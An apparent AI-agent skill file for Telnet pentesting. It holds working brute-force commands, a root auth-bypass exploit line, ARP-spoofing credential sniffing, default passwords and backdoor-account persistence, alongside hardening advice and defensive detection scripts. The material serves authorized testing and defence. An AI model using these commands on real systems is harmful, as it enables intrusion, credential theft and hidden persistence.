Hacktricks-skills telnet-pentesting

Pentest Telnet services (port 23) - use this skill whenever the user mentions Telnet, port 23, network service enumeration, credential brute-forcing, or vulnerability assessment of Telnet daemons. This skill covers banner grabbing, option enumeration, brute-force attacks, CVE exploitation (including CVE-2026-24061 auth bypass), credential sniffing, and hardening recommendations.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/pentesting-telnet/SKILL.MD
source content

Telnet Pentesting Skill

A comprehensive guide for assessing Telnet services during penetration testing engagements.

When to Use This Skill

Use this skill when:

  • You need to enumerate or exploit a Telnet service (port 23)
  • The user mentions Telnet, port 23, or network service testing
  • You're performing vulnerability assessment on legacy systems
  • You need to brute-force Telnet credentials
  • You're investigating CVE-2026-24061 or other Telnet vulnerabilities
  • You need to capture Telnet credentials in transit
  • You're hardening a system against Telnet attacks

Quick Reference

Task                      Command
Banner grab               nc -vn <IP> 23
Nmap enumeration          nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>
Brute force (Hydra)       hydra -L users.txt -P rockyou.txt -t 4 -f telnet://<IP>
CVE-2026-24061 exploit    USER='-f root' telnet -a <ip>
Credential sniffing       sudo tcpdump -i eth0 -A 'tcp port 23'

Enumeration Workflow

Step 1: Initial Reconnaissance

Start with basic banner grabbing to identify the Telnet daemon:

# Simple banner grab
nc -vn <IP> 23

# Or use telnet directly
telnet <IP> 23

Look for:

  • Service version strings
  • OS identification
  • Login prompts
  • Error messages that reveal implementation details

Step 2: Nmap Script Scanning

Run comprehensive Nmap scripts to enumerate Telnet options and vulnerabilities:

# Full Telnet enumeration (safe scripts only)
nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>

# Check for encryption option support
nmap -p 23 --script telnet-encryption <IP>

# Extract NTLM info (Windows/Microsoft Telnet)
nmap -p 23 --script telnet-ntlm-info <IP>

# Brute-force via NSE (alternative to Hydra)
nmap -p 23 --script telnet-brute --script-args userdb=users.txt,passdb=pass.txt <IP>

What these scripts do:

  • telnet-encryption: Checks if the ENCRYPT option is supported (some implementations had vulnerabilities)
  • telnet-ntlm-info: Discloses NetBIOS/DNS/OS build info when Microsoft Telnet NTLM is enabled
  • telnet-brute: NSE-based brute-force auditor

Step 3: Metasploit Enumeration

Use Metasploit auxiliary modules for deeper enumeration:

# Version detection
msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS <IP>; set RPORT 23; run; exit'

# Check for Brocade enable login vulnerability
msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS <IP>; set RPORT 23; run; exit'

# Test for encrypt overflow (Solaris 9/10)
msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS <IP>; set RPORT 23; run; exit'

# Check for RuggedCom vulnerability
msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS <IP>; set RPORT 23; run; exit'

Brute-Force Attacks

Hydra (Recommended)

# Basic brute-force with user/password lists
hydra -L users.txt -P rockyou.txt -t 4 -f telnet://<IP>

# Single user with multiple passwords
hydra -l admin -P rockyou.txt -t 4 -f telnet://<IP>

# With specific login format (if known)
hydra -L users.txt -P passwords.txt -t 4 -f -l "login:" telnet://<IP>

Hydra flags:

  • -L: Load usernames from file
  • -P: Load passwords from file
  • -t: Number of parallel tasks
  • -f: Exit after first valid login found
  • -V: Verbose output

Ncrack

# Brute-force with ncrack (drops to interactive session on success)
ncrack -p 23 --user admin -P common-pass.txt --connection-limit 4 <IP>

# With user list
ncrack -p 23 -U users.txt -P passwords.txt <IP>

Medusa

# Parallel brute-force across multiple hosts
medusa -M telnet -h targets.txt -U users.txt -P passwords.txt -t 6 -f

# Single host with verbose output
medusa -h <IP> -M telnet -u admin -P rockyou.txt -t 4 -f -v

Vulnerability Exploitation

CVE-2026-24061 - GNU Inetutils telnetd Auth Bypass (CRITICAL)

Affected versions: inetutils 1.9.3–2.7 (before 2.7-2)

Vulnerability: The telnetd daemon substitutes %U in its login template with getenv("USER") without filtering, allowing argv-level option injection.

Exploit:

# Inject USER via NEW_ENVIRON and obtain root shell
USER='-f root' telnet -a <ip>

How it works:

  1. Telnet negotiates the NEW_ENVIRON option to set USER=-f root
  2. telnetd builds the login argv: /usr/bin/login -h <hostname> "-f root"
  3. login -f root spawns a root shell without authentication

Detection:

# Check telnetd version
telnetd --version

# Check installed package
dpkg -l | grep inetutils

# Check if service is running
systemctl status inetutils-telnetd
netstat -tlnp | grep :23

Patch: Upgrade to inetutils 2.7-2 or later (Debian: 2:2.4-2+deb12u2, 2:2.6-3+deb13u1, 2:2.7-2)

CVE-2024-45698 - D-Link DIR-X4860 RCE

Affected: D-Link Wi-Fi 6 routers (DIR-X4860) with firmware before 1.04B05

Vulnerability: Improper input validation allows remote attackers to log in using hard-coded credentials and inject OS commands.

Mitigation: Update to firmware 1.04B05 or later.

CVE-2023-40478 - NETGEAR RAX30 Buffer Overflow

Affected: NETGEAR RAX30 routers

Vulnerability: A stack-based buffer overflow in the Telnet CLI passwd command enables code execution as root.

Note: Authentication is required but can often be bypassed with default credentials.

CVE-2022-39028 - GNU inetutils telnetd DoS

Affected: GNU inetutils telnetd

Vulnerability: A two-byte sequence (0xff 0xf7 / 0xff 0xf8) triggers a NULL-pointer dereference, causing a service crash.

Impact: Repeated crashes can cause inetd to disable the service (DoS).
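Both inetutils issues above live in the Telnet command layer, the same layer the Step 2 Nmap scripts enumerate option by option. The decoder below is an added example, not code from the HackTricks skill or from inetutils: it walks a Telnet byte stream (RFC 854 IAC commands, RFC 1572 NEW-ENVIRON subnegotiation) and reports the two patterns a capture of these attacks would carry, a NEW-ENVIRON variable whose value begins with '-' (the login argv injection of CVE-2026-24061) and bare IAC EC / IAC EL (0xff 0xf7 / 0xff 0xf8) arriving before any session data (the CVE-2022-39028 crash trigger). The sample stream is constructed; the option-name table covers only a handful of common options.

```python
"""Decode Telnet option negotiation and flag the two inetutils CVE patterns.

Added example (not part of the HackTricks skill). Sample bytes at the bottom
are constructed; IAC IAC escapes inside a subnegotiation body are left as-is.
"""

IAC, SB, SE = 255, 250, 240
WILL, WONT, DO, DONT = 251, 252, 253, 254
EC, EL = 247, 248                      # Erase Character / Erase Line (0xf7 / 0xf8)
NEW_ENVIRON = 39
ENV_IS, ENV_SEND, ENV_INFO = 0, 1, 2   # RFC 1572 message kinds
ENV_VAR, ENV_VALUE, ENV_ESC, ENV_USERVAR = 0, 1, 2, 3

CMD_NAMES = {WILL: "WILL", WONT: "WONT", DO: "DO", DONT: "DONT", EC: "EC", EL: "EL"}
OPT_NAMES = {0: "BINARY", 1: "ECHO", 3: "SGA", 24: "TTYPE", 31: "NAWS", 39: "NEW-ENVIRON"}


def parse_new_environ(body: bytes) -> dict:
    """Parse a NEW-ENVIRON body (bytes after the option byte) into
    {"kind": IS|SEND|INFO, "vars": {name: value}}. ESC quotes the next byte."""
    kind = {ENV_IS: "IS", ENV_SEND: "SEND", ENV_INFO: "INFO"}.get(body[0], "?")
    vars_, name, value, cur = {}, None, bytearray(), None

    def flush():  # store the variable collected so far, if any
        if name is not None:
            vars_[bytes(name).decode(errors="replace")] = bytes(value).decode(errors="replace")

    i = 1
    while i < len(body):
        b = body[i]
        if b in (ENV_VAR, ENV_USERVAR):          # a new variable name starts
            flush()
            name, value = bytearray(), bytearray()
            cur = name
        elif b == ENV_VALUE:                     # switch to collecting its value
            cur = value
        elif b == ENV_ESC and i + 1 < len(body):  # escaped control byte
            i += 1
            if cur is not None:
                cur.append(body[i])
        elif cur is not None:
            cur.append(b)
        i += 1
    flush()
    return {"kind": kind, "vars": vars_}


def _find_se(data: bytes, start: int) -> int:
    """Index of the IAC that closes a subnegotiation (IAC SE), skipping IAC IAC."""
    j = start
    while j + 1 < len(data):
        if data[j] == IAC:
            if data[j + 1] == SE:
                return j
            j += 2
        else:
            j += 1
    return -1


def decode_stream(data: bytes):
    """Split a stream into (events, session_data).

    Events: ("neg", verb, option) for WILL/WONT/DO/DONT, ("sb", option, parsed)
    for subnegotiations, ("cmd", name, bytes_of_session_data_seen_so_far) for
    other bare commands, so a detector can tell early commands from later ones."""
    events, plain, i = [], bytearray(), 0
    while i < len(data):
        if data[i] != IAC:
            plain.append(data[i])
            i += 1
            continue
        if i + 1 >= len(data):
            break                                # truncated command
        cmd = data[i + 1]
        if cmd == IAC:                           # escaped 0xff data byte
            plain.append(IAC)
            i += 2
        elif cmd in (WILL, WONT, DO, DONT):
            if i + 2 >= len(data):
                break
            events.append(("neg", CMD_NAMES[cmd], OPT_NAMES.get(data[i + 2], str(data[i + 2]))))
            i += 3
        elif cmd == SB:
            end = _find_se(data, i + 2)
            if end < 0:
                break
            opt, body = data[i + 2], data[i + 3:end]
            parsed = parse_new_environ(body) if opt == NEW_ENVIRON and body else bytes(body)
            events.append(("sb", OPT_NAMES.get(opt, str(opt)), parsed))
            i = end + 2
        else:
            events.append(("cmd", CMD_NAMES.get(cmd, str(cmd)), len(plain)))
            i += 2
    return events, bytes(plain)


def suspicious(events) -> list:
    """Findings for the two CVE patterns; EC/EL are only odd before any data."""
    findings = []
    for ev in events:
        if ev[0] == "sb" and ev[1] == "NEW-ENVIRON" and isinstance(ev[2], dict):
            for name, val in ev[2]["vars"].items():
                if val.startswith("-"):
                    findings.append(f"NEW-ENVIRON {name}={val!r} starts with '-' "
                                    "(login option injection, CVE-2026-24061 pattern)")
        elif ev[0] == "cmd" and ev[1] in ("EC", "EL") and ev[2] == 0:
            findings.append(f"IAC {ev[1]} before any session data "
                            "(telnetd crash trigger, CVE-2022-39028 pattern)")
    return findings


# Constructed client->server stream: offer NEW-ENVIRON, send USER, then bare
# EC and EL before any keystrokes, then a CR LF of real session data.
SAMPLE_STREAM = (
    bytes([IAC, WILL, NEW_ENVIRON])
    + bytes([IAC, SB, NEW_ENVIRON, ENV_IS, ENV_VAR]) + b"USER"
    + bytes([ENV_VALUE]) + b"-f root" + bytes([IAC, SE])
    + bytes([IAC, EC, IAC, EL])
    + b"\r\n"
)
```

Feed it the client side of a capture (for example the payload bytes of a `tcpdump -w` file reassembled per direction) and the `suspicious()` output is what an IDS rule for these two CVEs needs to express; a legitimate client sends EC/EL only after it has typed something.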

NETGEAR Telnet Enable Exploit

Many NETGEAR routers have a hidden telnet enable feature:

# Metasploit module
msfconsole -q -x 'use exploit/linux/mips/netgear_telnetenable; set RHOSTS <IP>; run; exit'

Credential Sniffing

Telnet transmits all data, including credentials, in clear-text. Capture them with:

tcpdump

# Live capture with ASCII output
sudo tcpdump -i eth0 -A "tcp port 23 and not src host $(hostname -I | cut -d' ' -f1)"  # double quotes so $(...) expands

# Save to file for later analysis
sudo tcpdump -i eth0 -w telnet_capture.pcap 'tcp port 23'

Wireshark

Display filter:

tcp.port == 23 && (telnet.data || telnet.option)

MITM Setup

For active MITM on switched networks:

# ARP spoofing with arpspoof
arpspoof -i eth0 -t <target> <gateway>

# Or use ettercap
ettercap -T -q -i eth0 -M arp:remote /<target>/ /<gateway>/

# Then sniff with tcpdump as above

Post-Exploitation

TTY Upgrade

After obtaining a shell, upgrade to a proper TTY:

# Python method
python -c 'import pty;pty.spawn("/bin/bash")'

# Python 3
python3 -c 'import pty;pty.spawn("/bin/bash")'

# Perl method
perl -e 'exec "/bin/bash -i";'

# Then in the new shell:
stty -a  # Check TTY settings
script -q /dev/null  # Alternative TTY upgrade

Persistence

Once you have access:

  1. Add user account:

    useradd -m -s /bin/bash backdoor
    echo 'backdoor:password' | chpasswd
    
  2. SSH key:

    mkdir -p /root/.ssh
    echo 'ssh-rsa AAAA...' >> /root/.ssh/authorized_keys
    chmod 700 /root/.ssh
    chmod 600 /root/.ssh/authorized_keys
    
  3. Check for other services:

    netstat -tlnp
    ps aux
    cat /etc/passwd
    

Hardening Recommendations (Blue Team)

Immediate Actions

  1. Disable Telnet completely - Prefer SSH for all remote access
  2. If Telnet is required:
    • Bind to management VLANs only
    • Enforce strict ACLs
    • Wrap with TCP wrappers (/etc/hosts.allow, /etc/hosts.deny)

Configuration Files to Check

/etc/inetd.conf
/etc/xinetd.d/telnet
/etc/xinetd.d/stelnet
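Checking those files by eye misses one detail: xinetd treats a stanza with no `disable` attribute as enabled. The audit below is an added example (not code from the HackTricks skill, inetd or xinetd); it reads the file contents as text, reports an active `telnet` line in inetd.conf, and for an xinetd `telnet`/`stelnet` stanza reports whether it is enabled and whether it lacks the `only_from` ACL and `bind`/`interface` restriction that the hardening list above calls for. The file contents are constructed samples; a `disabled =` list in the xinetd `defaults` stanza is not consulted.

```python
"""Audit inetd.conf and xinetd service files for a reachable Telnet daemon.

Added example (not part of the HackTricks skill). Sample file contents below
are constructed.
"""
import re


def inetd_telnet_enabled(inetd_conf: str) -> bool:
    """True if inetd.conf carries an active (uncommented) 'telnet' service line."""
    for line in inetd_conf.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.split()[0] == "telnet":         # first field is the service name
            return True
    return False


def parse_xinetd_service(text: str) -> dict:
    """Parse one 'service NAME { key = value ... }' stanza.

    Returns {"name": NAME, "attrs": {key: [values]}}; '=', '+=' and '-=' are
    all recorded as plain values, which is enough for an audit."""
    m = re.search(r"service\s+(\S+)\s*\{(.*?)\}", text, re.S)
    if not m:
        return {}
    attrs = {}
    for raw in m.group(2).splitlines():
        raw = raw.split("#", 1)[0].strip()       # drop comments
        if "=" not in raw:
            continue
        key, _, val = raw.partition("=")
        key = key.rstrip("+-").strip()
        attrs.setdefault(key, []).extend(val.split())
    return {"name": m.group(1), "attrs": attrs}


def audit_xinetd_telnet(text: str) -> list:
    """Findings for a telnet/stelnet stanza; an empty list means nothing to flag."""
    svc = parse_xinetd_service(text)
    if not svc or svc["name"] not in ("telnet", "stelnet"):
        return []
    attrs = svc["attrs"]
    # xinetd's default for a missing 'disable' attribute is 'no' (i.e. enabled)
    if attrs.get("disable", ["no"])[-1].lower() == "yes":
        return []
    findings = [f"{svc['name']} enabled via xinetd (server={' '.join(attrs.get('server', ['?']))})"]
    if "only_from" not in attrs:
        findings.append("no only_from ACL: reachable from any source address")
    if "bind" not in attrs and "interface" not in attrs:
        findings.append("no bind/interface: listens on every interface, not just management")
    return findings


# Constructed samples
INETD_CONF = """\
# /etc/inetd.conf (constructed sample)
#ftp   stream tcp nowait root /usr/sbin/tcpd in.ftpd
telnet stream tcp nowait telnetd /usr/sbin/tcpd /usr/sbin/in.telnetd
"""

XINETD_TELNET_WEAK = """\
service telnet
{
    flags       = REUSE
    socket_type = stream
    wait        = no
    user        = root
    server      = /usr/sbin/in.telnetd
    log_on_failure += USERID
}
"""

XINETD_TELNET_RESTRICTED = """\
service telnet
{
    disable     = no
    socket_type = stream
    wait        = no
    user        = root
    server      = /usr/sbin/in.telnetd
    bind        = 10.10.0.1        # management interface (constructed)
    only_from   = 10.10.0.0/24
}
"""

XINETD_TELNET_DISABLED = XINETD_TELNET_WEAK.replace("flags", "disable     = yes\n    flags")
```

Run `audit_xinetd_telnet(open("/etc/xinetd.d/telnet").read())` on a host and an empty list is the desired state; the `bind`/`only_from` findings map directly onto the "management VLANs only" and "strict ACLs" items above.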

Enhanced Security

  1. Replace with encrypted alternatives:

    • Use ssl-telnet or telnetd-ssl for transport encryption
    • Note: This only protects data-in-transit; password-guessing remains trivial
  2. Monitor for abuse:

    # Check for outbound Telnet (potential reverse shells)
    netstat -tunap | grep :23
    
    # Monitor authentication failures
    grep telnet /var/log/auth.log
    
  3. Network segmentation:

    • Isolate Telnet services to management networks
    • Block port 23 at perimeter firewalls
    • Implement IDS/IPS rules for Telnet traffic
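The `grep telnet /var/log/auth.log` step in item 2 only lists lines. The script below is an added example (not code from the HackTricks skill) of the monitoring it hints at: login(1), the program telnetd spawns, records failed attempts through pam_unix with the client's address in `rhost=`, so grouping those lines by source and counting failures inside a sliding window turns the guessing tools listed earlier on this page into an alert. The log lines are constructed in the pam_unix(login:auth) format; hostnames, PIDs, addresses and times are made up.

```python
"""Group Telnet login failures in auth.log by source host and alert on bursts.

Added example (not part of the HackTricks skill). Sample log lines are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime

THRESHOLD = 5   # failures from one source ...
WINDOW = 60     # ... within this many seconds triggers an alert

# pam_unix failure line written by login(1); telnetd passes the client
# address with 'login -h', which PAM reports as rhost=.
PAM_FAIL = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ login\[\d+\]: "
    r"pam_unix\(login:auth\): authentication failure; .*?rhost=(?P<rhost>\S*)"
    r".*?user=(?P<user>\S+)"
)


def parse_failures(lines):
    """Return [(timestamp, rhost, user)] for login(1) PAM failures; other lines are skipped."""
    out = []
    for line in lines:
        m = PAM_FAIL.match(line)
        if m:
            # syslog timestamps carry no year; a fixed one keeps deltas correct
            # within a year (a Dec->Jan capture would need the year supplied)
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
            out.append((ts, m["rhost"] or "local", m["user"]))
    return out


def detect_bursts(failures, threshold=THRESHOLD, window=WINDOW):
    """Sliding window per source: {rhost: (peak_failures_in_window, usernames_tried)}."""
    by_host = defaultdict(list)
    for ts, rhost, user in failures:
        by_host[rhost].append((ts, user))
    alerts = {}
    for rhost, events in by_host.items():
        events.sort()
        peak, start = 0, 0
        for end in range(len(events)):
            while (events[end][0] - events[start][0]).total_seconds() > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[rhost] = (peak, sorted({u for _, u in events}))
    return alerts


# Constructed sample: six failures from 10.0.0.5 in 18 s, one from 10.0.0.9,
# and an unrelated sshd line that must be ignored.
SAMPLE_LOG = """\
Jan 12 10:00:01 gw login[2301]: pam_unix(login:auth): authentication failure; logname=LOGIN uid=0 euid=0 tty=/dev/pts/0 ruser= rhost=10.0.0.5  user=root
Jan 12 10:00:04 gw login[2305]: pam_unix(login:auth): authentication failure; logname=LOGIN uid=0 euid=0 tty=/dev/pts/0 ruser= rhost=10.0.0.5  user=root
Jan 12 10:00:08 gw login[2309]: pam_unix(login:auth): authentication failure; logname=LOGIN uid=0 euid=0 tty=/dev/pts/1 ruser= rhost=10.0.0.5  user=admin
Jan 12 10:00:11 gw login[2313]: pam_unix(login:auth): authentication failure; logname=LOGIN uid=0 euid=0 tty=/dev/pts/1 ruser= rhost=10.0.0.5  user=admin
Jan 12 10:00:15 gw login[2317]: pam_unix(login:auth): authentication failure; logname=LOGIN uid=0 euid=0 tty=/dev/pts/0 ruser= rhost=10.0.0.5  user=root
Jan 12 10:00:19 gw login[2321]: pam_unix(login:auth): authentication failure; logname=LOGIN uid=0 euid=0 tty=/dev/pts/0 ruser= rhost=10.0.0.5  user=root
Jan 12 10:02:40 gw login[2400]: pam_unix(login:auth): authentication failure; logname=LOGIN uid=0 euid=0 tty=/dev/pts/2 ruser= rhost=10.0.0.9  user=root
Jan 12 10:03:00 gw sshd[2450]: Failed password for invalid user test from 10.0.0.7 port 51022 ssh2
"""

if __name__ == "__main__":
    for rhost, (count, users) in detect_bursts(parse_failures(SAMPLE_LOG.splitlines())).items():
        print(f"ALERT {rhost}: {count} Telnet login failures within {WINDOW}s, users tried: {users}")
```

Point `parse_failures` at `open("/var/log/auth.log")` (or a journalctl export) to run it for real; the threshold of 5 in 60 s is a starting value and should be tuned against the normal failure rate of the host.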

Common Default Credentials

Many IoT devices use default Telnet credentials. Test these:

Vendor     Username   Password
Generic    admin      admin
Generic    root       root
Generic    admin      password
Generic    admin      (blank)
Generic    root       (blank)
D-Link     admin      (blank)
NETGEAR    admin      password
NETGEAR    admin      (blank)
TP-Link    admin      admin
Cisco      cisco      cisco
Cisco      admin      admin

Quick Command Reference

# Enumeration
nc -vn <IP> 23
nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>
nmap -p 23 --script telnet-ntlm-info <IP>

# Brute-force
hydra -L users.txt -P rockyou.txt -t 4 -f telnet://<IP>
ncrack -p 23 -U users.txt -P passwords.txt <IP>
medusa -h <IP> -M telnet -U users.txt -P passwords.txt -t 4 -f

# CVE-2026-24061 exploit
USER='-f root' telnet -a <ip>

# Credential sniffing
sudo tcpdump -i eth0 -A 'tcp port 23'

# Metasploit enumeration
msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS <IP>; run; exit'

References